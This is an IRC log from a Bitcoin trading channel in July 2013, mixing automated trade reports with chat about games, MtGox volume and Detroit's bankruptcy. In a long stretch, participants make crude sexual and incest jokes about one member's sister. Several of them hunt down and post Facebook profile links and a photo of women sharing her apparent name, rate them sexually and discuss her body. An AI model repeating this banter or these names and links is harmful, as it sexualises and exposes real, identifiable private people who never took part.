[BTCTC] [B.YABMC] 1 @ 0.0025 BTC [+] Jul 18 15:47:17 [BTCTC] [B.YABMC] 90 @ 0.00255 = 0.2295 BTC [+] Jul 18 15:51:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0448 BTC [-] Jul 18 15:51:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.0448 = 0.0896 BTC [-] Jul 18 15:51:47 [BTCTC] [TAT.ASICMINER] 17 @ 0.044949 = 0.7641 BTC [+] Jul 18 15:51:47 [BTCTC] [TAT.ASICMINER] 80 @ 0.044949 = 3.5959 BTC [+] Jul 18 15:52:32 [BTCTC] [DMS.PURCHASE] 15 @ 0.039759 = 0.5964 BTC [+] Jul 18 15:53:33 [BTCTC] [ESECURITYSABTC] 1 @ 0.319838 BTC [+] Jul 18 15:55:09 [BTCTC] [DMS.PURCHASE] 15 @ 0.039759 = 0.5964 BTC [+] Jul 18 15:55:32 [BTCTC] [DMS.SELLING] 15 @ 0.024778 = 0.3717 BTC [-] Jul 18 15:56:09 [BTCTC] [TAT.ASICMINER] 7 @ 0.044949 = 0.3146 BTC [+] Jul 18 15:57:29 [BTCTC] [S.DICE-PT] 100 @ 0.00347 = 0.347 BTC [+] Jul 18 15:57:32 [BTCTC] [AMC-PT] 32 @ 0.00247 = 0.079 BTC [-] Jul 18 15:57:34 [BTCTC] [S.DICE-PT] 368 @ 0.0033 = 1.2144 BTC [-] Jul 18 15:59:11 [BTCTC] [LTC-MINING] 1 @ 0.42 BTC [+] Jul 18 15:59:57 [BTCTC] [LTC-ATF.B2] 10 @ 0.010397 = 0.104 BTC [+] Jul 18 16:04:08 [BTCTC] [TAT.ASICMINER] 93 @ 0.04495 = 4.1804 BTC [+] Jul 18 16:04:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003951 BTC [+] Jul 18 16:05:35 [BTCTC] [TAT.ASICMINER] 15 @ 0.04497 = 0.6746 BTC [+] Jul 18 16:07:27 [BTCTC] [TAT.ASICMINER] 56 @ 0.04498 = 2.5189 BTC [+] Jul 18 16:10:23 [BTCTC] [LTC-ATF.B2] 19 @ 0.010397 = 0.1975 BTC [+] Jul 18 16:15:45 [BTCTC] [S.DICE-PT] 60 @ 0.0033 = 0.198 BTC [-] Jul 18 16:16:34 I hate waking up still drunk Jul 18 16:16:43 [BTCTC] [LTC-ATF.B2] 10 @ 0.01021 = 0.1021 BTC [-] Jul 18 16:16:54 [BTCTC] [LTC-ATF.B2] 2 @ 0.010397 = 0.0208 BTC [+] Jul 18 16:17:28 [HAVELOCK] [AM100] 1 @ 0.0418 BTC [-] Jul 18 16:17:47 [BTCTC] [DMS.MINING] 15 @ 0.015947 = 0.2392 BTC [-] Jul 18 16:18:15 [HAVELOCK] [HIM] 46 @ 0.268 = 12.328 BTC [+] Jul 18 16:18:44 MtGox BTCUSD ticker | Best bid: 88.01829, Best ask: 88.61000, Bid-ask spread: 0.59171, Last trade: 88.61000, 24 hour volume: 50130.82558902, 24 hour low: 86.20000, 24 hour high: 98.89000, 24 hour vwap: 91.74827 Jul 18 16:19:04 [HAVELOCK] [AM100] 1 @ 0.0418 BTC [-] Jul 18 16:19:30 [BTCTC] [ASICMINER-PT] 2 @ 3.9 = 7.8 BTC [-] Jul 18 16:20:01 [BTCTC] [ASICMINER-PT] 1 @ 4.600001 BTC [+] Jul 18 16:20:09 [BTCTC] [ASICMINER-PT] 10 @ 4.6 = 46 BTC [-] Jul 18 16:20:34 [BTCTC] [ASICMINER-PT] 8 @ 3.9 = 31.2 BTC [-] Jul 18 16:20:45 [BTCTC] [S.DICE-PT] 1000 @ 0.0033 = 3.3 BTC [-] Jul 18 16:22:29 [BTCTC] [ASICMINER-PT] 1 @ 4.569002 BTC [+] Jul 18 16:23:09 [BTCTC] [S.DICE-PT] 8 @ 0.0033 = 0.0264 BTC [-] Jul 18 16:23:42 Hey whats up Jul 18 16:24:10 Trying to figure out if i'm going to get this cities in motion game Jul 18 16:24:18 and probably the witcher 2 Jul 18 16:24:39 [BTCTC] [ASICMINER-PT] 2 @ 4.68999 = 9.38 BTC [+] Jul 18 16:25:26 damn Jul 18 16:26:38 I've heard nothing but good things about it Jul 18 16:26:59 purchased Jul 18 16:28:11 [BTCTC] [TAT.ASICMINER] 20 @ 0.04495 = 0.899 BTC [-] Jul 18 16:29:32 [BTCTC] [S.DICE-PT] 2722 @ 0.0033 = 8.9826 BTC [-] Jul 18 16:30:54 [BTCTC] [ASICMINER-PT] 5 @ 4.68998 = 23.4499 BTC [-] Jul 18 16:30:56 [BTCTC] [ASICMINER-PT] 8 @ 4.68999 = 37.5199 BTC [+] Jul 18 16:30:59 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [+] Jul 18 16:31:02 [BTCTC] [ASICMINER-PT] 1 @ 4.69777 BTC [+] Jul 18 16:31:44 Hmmmmm so I can kill people in Cities in motion? Jul 18 16:32:02 [BTCTC] [ASICMINER-PT] 10 @ 3.99 = 39.9 BTC [-] Jul 18 16:34:03 well i just purchased both lol Jul 18 16:34:39 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Jul 18 16:35:44 I don't really have much time, but my steam collection is massive... So whenever I do have time, I'll have plenty of choices Jul 18 16:35:59 [BTCTC] [COGNITIVE] 1 @ 0.660785 BTC [+] Jul 18 16:36:14 [BTCTC] [TAT.ASICMINER] 18 @ 0.0446 = 0.8028 BTC [-] Jul 18 16:38:46 [BTCTC] [TAT.ASICMINER] 27 @ 0.0446 = 1.2042 BTC [-] Jul 18 16:38:48 [BTCTC] [TAT.ASICMINER] 55 @ 0.04494 = 2.4717 BTC [+] Jul 18 16:38:49 [09:35] massive spread on dem AM shares <<<< from GGGGG buying too aggressively Jul 18 16:38:51 [BTCTC] [TAT.ASICMINER] 28 @ 0.044945 = 1.2585 BTC [+] Jul 18 16:38:53 [BTCTC] [TAT.ASICMINER] 160 @ 0.04495 = 7.192 BTC [+] Jul 18 16:38:55 o god cs Jul 18 16:38:55 [BTCTC] [TAT.ASICMINER] 7 @ 0.04498 = 0.3149 BTC [+] Jul 18 16:39:29 I still play cs like crazy, used to do professionally at one point. Was sponsored by Bawls, those were the days lol Jul 18 16:40:21 Same Jul 18 16:41:00 [BTCTC] [TAT.ASICMINER] 18 @ 0.044979 = 0.8096 BTC [-] Jul 18 16:41:02 [BTCTC] [TAT.ASICMINER] 232 @ 0.04498 = 10.4354 BTC [+] Jul 18 16:41:07 I developed a similar game for the Unreal engine during the development of CS on hl1. Used to have talks with Gooseman and cliff on both games Jul 18 16:41:24 developed ~ was developing **** BEGIN LOGGING AT Thu Jul 18 22:25:50 2013 Jul 18 22:25:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.04829 = 0.9658 BTC [-] Jul 18 22:27:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.0483 = 0.1449 BTC [+] Jul 18 22:28:19 [HAVELOCK] [SDSTM] 5 @ 0.0101 = 0.0505 BTC [+] Jul 18 22:28:26 o/ mircea_popescu Jul 18 22:28:37 heya Jul 18 22:30:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.048 = 0.24 BTC [-] Jul 18 22:30:47 [HAVELOCK] [AM100] 2 @ 0.042497 = 0.085 BTC [-] Jul 18 22:30:50 we know it was you mircea_popescu Jul 18 22:30:58 hm ? Jul 18 22:31:11 oh, you know Jul 18 22:31:14 [HAVELOCK] [AM100] 20 @ 0.042498 = 0.85 BTC [+] Jul 18 22:31:28 [BTCTC] [AMC-PT] 97 @ 0.0025 = 0.2425 BTC [+] Jul 18 22:31:32 i didn't get your sister pregnant. Jul 18 22:31:47 she just has a thing for me and is making shit up Jul 18 22:31:50 which is common at 16. Jul 18 22:31:57 i should hope not, being that one doesn't exist Jul 18 22:32:00 that I know of Jul 18 22:32:15 a ok than Jul 18 22:32:25 It might have been me... I am sorry :( Jul 18 22:32:32 She had it coming though :/ Jul 18 22:32:37 had me worried for a moment there. Jul 18 22:32:43 tho i have absolutely nothing to be worried about. Jul 18 22:32:52 lol "she had it coming" Jul 18 22:32:57 Nah, I was the one that knocked her up ;) Jul 18 22:33:11 [HAVELOCK] [AM1] 4 @ 4.6 = 18.4 BTC [+] Jul 18 22:33:57 "She had it coming" -- I mean seriously have you seen her Jul 18 22:37:08 10 / 10 would bang again. Jul 18 22:37:14 so, TAT's nonexistant sister is a little slut? Jul 18 22:37:23 However, don't come looking for the benefits, I'm not paying. Jul 18 22:37:24 Yes Jul 18 22:37:26 10 / 10 Jul 18 22:37:37 She is passed a long more than the common cold. Jul 18 22:37:47 you had TAT.VIRTUALSEX Jul 18 22:37:55 [MPEX] [S.MPOE] 19408 @ 0.00088592 = 17.1939 BTC [-] Jul 18 22:38:00 :/ Maybe... Jul 18 22:38:05 if I had a sister, I'd def PT her Jul 18 22:38:16 I all ready did ;) Jul 18 22:38:22 PT=passthrough? Jul 18 22:38:27 yep Jul 18 22:39:02 [HAVELOCK] [AM100] 3 @ 0.04200001 = 0.126 BTC [-] Jul 18 22:39:04 [HAVELOCK] [AM100] 3 @ 0.04200001 = 0.126 BTC [-] Jul 18 22:39:08 I passed through her ;0 Jul 18 22:39:18 obv I'd PT my cat if I could, PT PT PT PT PT PT Jul 18 22:39:28 [HAVELOCK] [AM100] 42 @ 0.042 = 1.764 BTC [-] Jul 18 22:39:34 I laughed Jul 18 22:39:52 ThickAsThieves, okay, making fun of the sister = fine, bestiality, nope. Jul 18 22:40:09 you're the one with the kinky mind Jul 18 22:40:23 i'm just self-deprecating about how issue a lot of PTs Jul 18 22:40:28 hmmm Jul 18 22:40:36 I Jul 18 22:40:39 TAT, it's this one? random_cat Jul 18 22:40:53 But seriously, TAT.VIRTUALSEX --- 10 / 10. Jul 18 22:41:24 pays divs equivalent what my sister would make if I pimped her out Jul 18 22:41:33 0 Jul 18 22:41:54 [MPEX] [S.MPOE] 5563 @ 0.00088592 = 4.9284 BTC [-] Jul 18 22:42:12 Wait, what, you don't pimp her Jul 18 22:42:17 she lied and stole my money then :/ Jul 18 22:42:27 [BTCTC] [BITVPS] 3 @ 0.00182 = 0.0055 BTC [+] Jul 18 22:42:51 ThickAsThieves, okay, making fun of the sister = fine, bestiality, nope. <<< ashahaha Jul 18 22:42:58 I would suggest that everyone buys BITVPS, so that I can recoup my investment. Jul 18 22:43:02 Of course ;0 Jul 18 22:43:10 [BTCTC] [AMC-PT] 1450 @ 0.0025 = 3.625 BTC [+] Jul 18 22:43:14 hey tat, it's ok for as long as we bother some other people's expectations! but leave mine alone! Jul 18 22:43:32 mircea_popescu, do you have a sister? Jul 18 22:43:35 [HAVELOCK] [AM100] 1 @ 0.042497 BTC [+] Jul 18 22:43:37 yes actually. Jul 18 22:43:39 and if so, is she hot? Jul 18 22:43:52 the eternal question Jul 18 22:43:58 Is my sister hot? Jul 18 22:44:09 how much btc for a pic? Jul 18 22:44:13 she is kind-of hot. Jul 18 22:44:13 Yours is, yes. Jul 18 22:44:14 hm Jul 18 22:44:23 ;;google trilema curva de sora-ta Jul 18 22:44:24 No matches found. Jul 18 22:44:26 Oh, so we are onto incest now, that's just perfect. Jul 18 22:44:27 ejh get out. Jul 18 22:44:30 MCM-Mike, only with "MP" on her boobs then Jul 18 22:44:32 [HAVELOCK] [SDSTM] 1 @ 0.0101 BTC [+] Jul 18 22:44:35 [BTCTC] [TAT.ASICMINER] 40 @ 0.048 = 1.92 BTC [-] Jul 18 22:44:36 http://trilema.com/2011/de-ce-sora-mea-ii-mai-buna-decit-curva-de-sora-ta-chestie-pe-care-o-cunosc-personal/ Jul 18 22:44:40 De ce sora-mea ii mai buna decit curva de sora-ta (chestie pe care o cunosc personal) pe Trilema - U Jul 18 22:44:40 there, load up your google translates. Jul 18 22:44:49 [HAVELOCK] [AM100] 5 @ 0.042498 = 0.2125 BTC [+] Jul 18 22:44:53 perhaps we should all invest to get a peak Jul 18 22:44:58 [HAVELOCK] [AM100] 51 @ 0.042498 = 2.1674 BTC [+] Jul 18 22:50:26 too many results for ana maria popescu on fb Jul 18 22:50:56 Quick FB search: Jul 18 22:50:56 https://www.facebook.com/ankaa.doncheva?fref=ts Jul 18 22:51:01 10 / 10 would bang. Jul 18 22:51:19 doing it wrong Jul 18 22:51:20 lol. hateboys :) Jul 18 22:51:25 Yea Jul 18 22:51:26 would bang / 10 Jul 18 22:51:28 I was like hmm... Jul 18 22:51:41 looks more like escort Jul 18 22:52:21 https://www.google.sk/search?q=popescu+ana+maria , click Pictures, choose any Jul 18 22:52:25 I'm still down with that. Jul 18 22:52:25 This content is currently unavailable Jul 18 22:52:51 mp, way to get a dozen creeps to search for your sister and then fap to the likeness of their choosing Jul 18 22:53:10 [HAVELOCK] [AM100] 1 @ 0.042497 BTC [-] Jul 18 22:53:15 ThickAsThieves ty. Jul 18 22:53:16 Hahahahaa, so true^^ Jul 18 22:53:29 mircea_popescu, can you confirm any of these pictures Jul 18 22:53:30 ? Jul 18 22:53:35 lol Jul 18 22:53:37 lol Jul 18 22:53:42 why ruin everyone's fun Jul 18 22:53:58 [HAVELOCK] [AM100] 123 @ 0.042498 = 5.2273 BTC [+] Jul 18 22:54:06 but anyway, the title reads in actual english "why my sister is better than that whore of yours, a point with which i am personally familiar" Jul 18 22:54:08 It wouldn't ruin my fun, it would make me far happier ;) Jul 18 22:55:32 do a bone structure analysis on MP's face pic on trilema Jul 18 22:55:41 cross-reference all Ana-Marias Jul 18 22:55:43 bam Jul 18 22:55:45 Ana-Maria Popescu M. Prevention of overweight in preadolescents through social marketing strategies Prof. Adriana Baban 10 Jul 18 22:55:50 enhance! Jul 18 22:55:57 social network enthusiast :D Jul 18 22:56:00 enhance moar! Jul 18 22:56:15 [HAVELOCK] [AM100] 25 @ 0.042499 = 1.0625 BTC [+] Jul 18 22:56:42 Ana-Maria Popescu M., Educating gender identity in schools in order to prevent overweight in preadolescents, Prof. Adriana Baban Jul 18 22:57:32 ThickAsThieves | mp, way to get a dozen creeps to search for your sister and then fap to the likeness of their choosing Jul 18 22:57:35 9/10 Jul 18 22:58:39 9/10 creeps? Jul 18 22:59:03 10 / 10 ;) Jul 18 22:59:03 the trilema article is a copulation material by itself: Because it is just so superior in its transcendent intelligence, you better not did I say, exciting and snaps organu 'copulating school requirements. Jul 18 22:59:12 9/10 quote of the day Jul 18 22:59:15 lmao Jul 18 23:00:12 [HAVELOCK] [AM100] 1 @ 0.042499 BTC [+] Jul 18 23:01:09 Pentru ca este chiar atit de superioara in inteligenta ei transcendenta, ca mai bine nu i-oi zice, incit i se fringe organu’ copulator de cerintele scolare. = because she is quite that far above, in her transcendent intelligence for lack of more polite words, that she couldn't give a fuck out of her copulative ourgan on academic requirements. Jul 18 23:01:16 roughly speaking. Jul 18 23:01:54 mircea_popescu, is she like skinny? Jul 18 23:02:02 or moderate Jul 18 23:02:04 or large? Jul 18 23:02:12 or larger than large? Jul 18 23:02:26 last i saw her she was like 100 pounds or something. Jul 18 23:02:29 time to put the rumours to rest and post some pics Jul 18 23:02:39 DO IT Jul 18 23:02:43 Pics or gtof Jul 18 23:02:43 Agreed Jul 18 23:02:45 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 18 23:02:46 gtfo Jul 18 23:03:16 so 45 kg Jul 18 23:03:21 that's not much Jul 18 23:03:38 [HAVELOCK] [AM100] 75 @ 0.0425 = 3.1875 BTC [+] Jul 18 23:03:40 does anyone has a mirror of https://twitter.com/SirBitsALot 's videos? Jul 18 23:03:47 lol, how mention of females shifts the channel topic away from s.dice Jul 18 23:04:18 100 pounds, more appealing Jul 18 23:04:23 pics please. Jul 18 23:04:31 [HAVELOCK] [AM100] 1 @ 0.042 BTC [-] Jul 18 23:04:33 [HAVELOCK] [AM100] 4 @ 0.042 = 0.168 BTC [-] Jul 18 23:04:36 mp knows his misdirection Jul 18 23:04:39 45kg is not much, unless you're 3 foot tall. Jul 18 23:04:45 Height? Jul 18 23:04:50 hahaha Namworld! Jul 18 23:05:00 I know my stuff... Jul 18 23:05:03 Namworld i dunno dude, like a woman's height Jul 18 23:05:10 https://www.facebook.com/anna.mariapopescu.73?fref=ts Jul 18 23:05:10 5 something Jul 18 23:05:14 More than 5'4? Jul 18 23:05:21 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 18 23:05:25 SI UNITS Jul 18 23:05:30 for fucks sake Jul 18 23:05:34 Then very skinny. Jul 18 23:05:49 hey that chick's hot jurov Jul 18 23:05:53 Imma feeling she is getting more bangable by the minute ;) Jul 18 23:06:00 way hot Jul 18 23:06:13 too hot to be mp's sister Jul 18 23:06:25 skull analysis failed Jul 18 23:06:42 ThickAsThieves logically speaking hot chicks tend to be my sister because i bang a lot of hot chicks anyway so they can survive unmolested. Jul 18 23:06:42 [HAVELOCK] [AM100] 3 @ 0.042499 = 0.1275 BTC [+] Jul 18 23:06:43 [HAVELOCK] [AM100] 1 @ 0.042 BTC [-] Jul 18 23:07:16 you have a way with words Jul 18 23:07:37 even better one: https://www.facebook.com/annamaria.popescu.1 Jul 18 23:07:39 mircea_popescu, you can fool me, but you can't fool yourself, "i bang a lot of hot chicks" Jul 18 23:07:52 matthew_boyd you're new here are you. Jul 18 23:07:52 lol Jul 18 23:07:58 +10000000000 @ jurov Jul 18 23:08:03 aren''t* Jul 18 23:08:07 Of course mircea_popescu Jul 18 23:08:21 [BTCTC] [TAT.ASICMINER] 7 @ 0.0477 = 0.3339 BTC [-] Jul 18 23:08:29 [HAVELOCK] [AM100] 15 @ 0.0425 = 0.6375 BTC [+] Jul 18 23:08:32 http://trilema.com/2011/nsfw-gradina-edenului/ Jul 18 23:08:35 there, have fun Jul 18 23:08:36 NSFW Gradina Edenului pe Trilema - Un blog de Mircea Popescu. Jul 18 23:08:39 https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-ash4/420765_116150318512371_836971684_n.jpg Jul 18 23:08:42 jesus christ these fucking nails Jul 18 23:08:45 0/ 10 Jul 18 23:09:14 a bit skinnier: https://www.facebook.com/annamaria.popescu.5 Jul 18 23:09:22 nah, the camwhoring/mirror picain't her. Jul 18 23:09:28 not old enough either, that chick looks 15 Jul 18 23:09:43 Favorites Jul 18 23:09:43 Other Jul 18 23:09:43 Jul 18 23:09:44 George W. Bush Jul 18 23:09:47 sorry to disappoint Jul 18 23:10:04 [MPEX] [S.MPOE] 3749 @ 0.0008906 = 3.3389 BTC [+] Jul 18 23:10:06 [MPEX] [S.MPOE] 3900 @ 0.00089081 = 3.4742 BTC [+] Jul 18 23:10:14 see tat ? that's how it's done. Jul 18 23:10:22 [MPEX] [S.MPOE] 10700 @ 0.0008916 = 9.5401 BTC [+] Jul 18 23:10:34 misdirection? Jul 18 23:10:58 i have monk-like discipline Jul 18 23:11:04 [MPEX] [S.MPOE] 10700 @ 0.0008916 = 9.5401 BTC [+] Jul 18 23:11:13 what are we misdirecting? Jul 18 23:11:33 mp knows Jul 18 23:11:39 and I know Jul 18 23:11:40 we're trying to shoot cum in a spiral fashion towards the monitor Jul 18 23:11:48 through our unelected representatives. Jul 18 23:12:03 but only time will tell Jul 18 23:12:16 [BTCTC] [DMS.MINING] 198 @ 0.015001 = 2.9702 BTC [-] Jul 18 23:13:32 [BTCTC] [DMS.MINING] 100 @ 0.015 = 1.5 BTC [-] Jul 18 23:13:34 [BTCTC] [DMS.MINING] 255 @ 0.015 = 3.825 BTC [-] Jul 18 23:13:36 [BTCTC] [DMS.MINING] 10 @ 0.015 = 0.15 BTC [-] Jul 18 23:13:37 [BTCTC] [DMS.MINING] 6 @ 0.015 = 0.09 BTC [-] Jul 18 23:13:45 ok so in case anyone's curious im preparing an annotated list of all mpex closed assets. Jul 18 23:13:49 [BTCTC] [AMC-PT] 700 @ 0.0025 = 1.75 BTC [+] Jul 18 23:14:08 i am Jul 18 23:14:15 I'd read it Jul 18 23:14:21 K.KBRL should have honorable mention Jul 18 23:14:29 i'm like halfway done with reading every other bitcoin/finance thing Jul 18 23:14:34 what's k.kbrl? Jul 18 23:14:41 kakobrekla Jul 18 23:14:43 lol ya Jul 18 23:14:52 and NAT.ROUTERS Jul 18 23:14:52 that was the thing before NAT.ROUTERS Jul 18 23:15:22 you know what it was even beforer ? Jul 18 23:15:27 can I get TAT.VIRTUALSEX next? Jul 18 23:16:07 where do I insert the bitcoin for that Jul 18 23:16:21 any slot you choose Jul 18 23:16:33 excellent Jul 18 23:16:47 ThickAsThieves mebbe Jul 18 23:16:49 mircea_popescu, just got the link you provided, it's excellente, now how much did you pay them to pose? :P Jul 18 23:16:50 the routers are getting old Jul 18 23:16:58 ahh B.BITB Jul 18 23:17:02 matthew_boyd i wasn't paying as such. Jul 18 23:17:04 jurov yup Jul 18 23:17:31 and klin or smth? Jul 18 23:17:44 or kiln Jul 18 23:17:47 or what Jul 18 23:18:13 milk. Jul 18 23:18:15 behold: http://web.archive.org/web/20120414041524/http://polimedia.us/bitcoin/mpex.php Jul 18 23:19:06 [BTCTC] [TAT.ASICMINER] 25 @ 0.0477 = 1.1925 BTC [-] Jul 18 23:21:29 [BTCTC] [AMC-PT] 19 @ 0.002497 = 0.0474 BTC [-] Jul 18 23:21:32 [BTCTC] [AMC-PT] 164 @ 0.00249 = 0.4084 BTC [-] Jul 18 23:21:49 https://bitcointalk.org/index.php?topic=79637.460 Jul 18 23:21:54 i just found that. Jul 18 23:22:14 on a separate note, why is MtGox still the largest volume exchange? With all the trouble they have, who is still selling there? Jul 18 23:22:28 [BTCTC] [AMC-PT] 1 @ 0.00249 BTC [-] Jul 18 23:22:46 seems they just bot each other Jul 18 23:23:26 [BTCTC] [BASIC-MINING] 1 @ 0.735 BTC [-] Jul 18 23:23:52 PeterL_ we get to see exactly how muich of their "largest volume" was purely fake. Jul 18 23:24:02 https://twitter.com/freep/status/357958505686249472 Jul 18 23:24:02 nobody is trading there, outside of a few random noobs and their fiddy bux. Jul 18 23:24:06 Twitter / freep: Breaking: Detroit files for ... Jul 18 23:24:16 [BTCTC] [ASICMINER-PT] 5 @ 4.781 = 23.905 BTC [-] Jul 18 23:24:17 [BTCTC] [ASICMINER-PT] 5 @ 4.78 = 23.9 BTC [-] Jul 18 23:24:41 heh, I hadn't even thought that they were rigging the volume metric to make themselves look better Jul 18 23:25:14 [BTCTC] [BASIC-MINING] 1 @ 0.720004 BTC [-] Jul 18 23:25:17 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [-] Jul 18 23:25:19 [BTCTC] [AMC-PT] 201 @ 0.00249 = 0.5005 BTC [-] Jul 18 23:25:23 [BTCTC] [BASIC-MINING] 2 @ 0.72 = 1.44 BTC [-] Jul 18 23:25:33 http://www.freep.com/article/20130718/NEWS01/307180107/Detroit-files-Chapter-9-bankruptcy-amid-staggering-debts Jul 18 23:25:37 Detroit files for Chapter 9 bankruptcy amid staggering debts | Detroit Free Press | freep.com Jul 18 23:25:42 here's the actual article Jul 18 23:27:11 "we get to see exactly how much of their ... volume was fake" Jul 18 23:27:13 sauce? Jul 18 23:27:31 thx PeterL_ Jul 18 23:27:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.048 = 0.096 BTC [+] Jul 18 23:27:57 we could all see this coming for Detroit, why are people surised? Jul 18 23:28:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.048 BTC [+] Jul 18 23:29:58 [BTCTC] [TAT.ASICMINER] 24 @ 0.0477 = 1.1448 BTC [-] Jul 18 23:30:30 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0038 = 0.038 BTC [+] Jul 18 23:30:44 [HAVELOCK] [HIM] 1 @ 0.267 BTC [-] Jul 18 23:31:00 [HAVELOCK] [HIM] 15 @ 0.26600001 = 3.99 BTC [-] Jul 18 23:31:03 [BTCTC] [AMC-PT] 433 @ 0.00249 = 1.0782 BTC [-] Jul 18 23:31:03 california next ? Jul 18 23:31:12 I'm not suprised in the least. But just underlines the nonsense of bernakazi and all time highs for S&P et. al. Jul 18 23:31:13 [HAVELOCK] [HIM] 4 @ 0.266 = 1.064 BTC [-] Jul 18 23:31:48 [BTCTC] [BMF] 1 @ 0.035998 BTC [-] Jul 18 23:32:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.048 = 0.144 BTC [+] Jul 18 23:32:55 mircea_popescu: yeah, might be. i think this is just the beginning of many more to come. Jul 18 23:33:32 suprised california wasnt first..but then again detroit has been in trouble a long time and has a lot less going for it. Jul 18 23:33:41 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Jul 18 23:34:15 didn't california already like a year ago? Jul 18 23:34:18 mircea_popescu: I don't want #bitcoin-anal anymore I'm gonng register #bitcon-ass Jul 18 23:34:22 [BTCTC] [ASICMINER-PT] 1 @ 4.858999 BTC [+] Jul 18 23:34:24 instead Jul 18 23:34:39 suprised you wouldnt sell it Jul 18 23:34:46 cool Jul 18 23:35:00 what do i need money for. Jul 18 23:35:19 [MPEX] [S.MPOE] 5650 @ 0.00089245 = 5.0423 BTC [+] Jul 18 23:35:48 [BTCTC] [TAT.ASICMINER] 50 @ 0.048 = 2.4 BTC [+] Jul 18 23:35:57 Someone sent me a donation of 22 BTC and emailed me it was a mistake and he wanted to send 0.22... Jul 18 23:36:44 [BTCTC] [GSDPT] 7 @ 0.00342 = 0.0239 BTC [+] Jul 18 23:37:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.048001 BTC [+] Jul 18 23:37:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.048 = 0.144 BTC [-] Jul 18 23:37:49 [BTCTC] [TAT.ASICMINER] 35 @ 0.0477 = 1.6695 BTC [-] Jul 18 23:38:30 rich people. Jul 18 23:38:32 [BTCTC] [BTC-BOND] 30 @ 0.009996 = 0.2999 BTC [+] Jul 18 23:38:40 [BTCTC] [COGNITIVE] 4 @ 0.799999 = 3.2 BTC [+] Jul 18 23:38:42 [BTCTC] [TAT.ASICMINER] 21 @ 0.0476 = 0.9996 BTC [-] Jul 18 23:38:43 [BTCTC] [COGNITIVE] 21 @ 0.8 = 16.8 BTC [+] Jul 18 23:39:15 [BTCTC] [S.DICE-PT] 10 @ 0.00347 = 0.0347 BTC [+] Jul 18 23:40:32 I hope he can sign from one of the sending address. Jul 18 23:40:50 [BTCTC] [AMC-PT] 9 @ 0.00249 = 0.0224 BTC [-] Jul 18 23:41:45 Cause that's my public address and the guy wants it sent to a different address. Jul 18 23:43:37 [BTCTC] [TAT.ASICMINER] 20 @ 0.0476 = 0.952 BTC [-] Jul 18 23:43:55 [BTCTC] [AMC-PT] 5 @ 0.00249 = 0.0125 BTC [-] Jul 18 23:44:37 [MPEX] [S.MPOE] 8059 @ 0.00089237 = 7.1916 BTC [-] Jul 18 23:44:39 [MPEX] [S.MPOE] 12241 @ 0.00089159 = 10.914 BTC [-] Jul 18 23:45:05 [BTCTC] [S.DICE-PT] 220 @ 0.003304 = 0.7269 BTC [-] Jul 18 23:45:09 [BTCTC] [S.DICE-PT] 1 @ 0.003303 BTC [-] Jul 18 23:45:11 [BTCTC] [S.DICE-PT] 29 @ 0.003302 = 0.0958 BTC [-] Jul 18 23:45:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.047999 BTC [+] Jul 18 23:45:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.048 BTC [+] Jul 18 23:45:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.0483 = 0.7245 BTC [+] Jul 18 23:45:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.0483 = 0.0966 BTC [+] Jul 18 23:45:28 [BTCTC] [TAT.ASICMINER] 16 @ 0.04849 = 0.7758 BTC [+] Jul 18 23:45:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.0485 = 0.097 BTC [+] Jul 18 23:46:13 [BTCTC] [AMC-PT] 650 @ 0.00249 = 1.6185 BTC [-] Jul 18 23:47:24 Namworld you accept donation for what cause? Jul 18 23:47:39 *donations Jul 18 23:48:46 the just 'cause Jul 18 23:49:01 namcdn.com/btcalarm/ Jul 18 23:49:28 I put my donation address on it. Jul 18 23:49:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.04855 BTC [+] Jul 18 23:50:21 [BTCTC] [AMC-PT] 3518 @ 0.00249 = 8.7598 BTC [-] Jul 18 23:50:23 [BTCTC] [AMC-PT] 2482 @ 0.0025 = 6.205 BTC [+] Jul 18 23:50:58 I dig the layout Jul 18 23:51:01 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [-] Jul 18 23:51:02 nice and clean Jul 18 23:52:20 [HAVELOCK] [VTX] 1 @ 0.63100001 BTC [-] Jul 18 23:52:22 [HAVELOCK] [VTX] 4 @ 0.631 = 2.524 BTC [-] Jul 18 23:53:23 Yeah, well I can work with CSS, but not with Photoshop. So there's usually not many graphics included. Jul 18 23:54:18 CSS is all you need, you should start an exchange Jul 18 23:54:26 hah Jul 18 23:54:29 [BTCTC] [TAT.VIRTUALMINE] 390 @ 0.0038 = 1.482 BTC [+] Jul 18 23:55:44 [HAVELOCK] [AM100] 122 @ 0.0425 = 5.185 BTC [+] Jul 18 23:55:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00396 BTC [+] Jul 18 23:55:59 "Website Maintenance - $30 per hour" you're kinda cheap Jul 18 23:56:39 that's what a housemaid charges around here Jul 18 23:57:16 I put that years ago and kinda never had any client cause you know, it's not really advertised anywhere. Jul 18 23:57:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.04855 = 0.0971 BTC [+] Jul 18 23:57:35 And I make just so much more trading BTC stocks/flipping shares/etc Jul 18 23:57:52 [BTCTC] [AMC-PT] 1500 @ 0.0025 = 3.75 BTC [+] Jul 18 23:57:56 There's basically just my family left hosted there which I don't charge anymore for the service. Jul 18 23:58:36 Also I'm one of the owner of BitVPS now so that kinda makes that 